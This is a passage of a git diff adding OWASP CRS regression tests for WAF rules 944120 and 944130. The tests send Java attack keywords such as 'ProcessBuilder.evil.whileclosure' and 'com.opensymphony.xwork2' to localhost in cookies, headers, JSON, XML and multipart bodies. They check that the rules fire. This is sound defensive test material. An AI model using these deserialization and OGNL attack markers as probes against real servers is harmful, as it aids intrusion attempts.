- stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-105 + desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-106 + desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeserializationfactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-107 + desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-108 + desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-109 + desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-110 + desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-111 + desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-112 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-113 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-114 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-115 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-116 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-117 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-118 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-119 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-120 + desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-121 + desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-122 + desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-123 + desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.whileclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-124 + desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-125 + desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-126 + desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-127 + desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-128 + desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-129 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-130 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-131 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: | + {"test": "ProcessBuilder.evil.whileclosure"} + output: + log_contains: "id \"944120\"" + - test_title: 944120-132 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: | + {"ProcessBuilder.evil.whileclosure": "test"} + output: + log_contains: "id \"944120\"" + - test_title: 944120-133 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-134 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-135 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-136 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml new file mode 100644 index 00000000..b1f4961d --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml @@ -0,0 +1,8063 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944130.yaml" + description: "Positive tests for rule 944130" +tests: + - test_title: 944130-1 + desc: "Argument test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-2 + desc: "Argument name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-3 + desc: "Cookie test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.opensymphony.xwork2 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-4 + desc: "Cookie name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.opensymphony.xwork2=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-5 + desc: "Request header test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.opensymphony.xwork2 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-6 + desc: "XML attribute value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-7 + desc: "XML element value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-8 + desc: "Nested XML element value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-9 + desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-10 + desc: "Content-Type application/json arg value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"com.opensymphony.xwork2\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-11 + desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"com.opensymphony.xwork2\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-12 + desc: "Argument test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-13 + desc: "Argument name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-14 + desc: "Cookie test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.sun.org.apache + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-15 + desc: "Cookie name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.sun.org.apache=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-16 + desc: "Request header test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 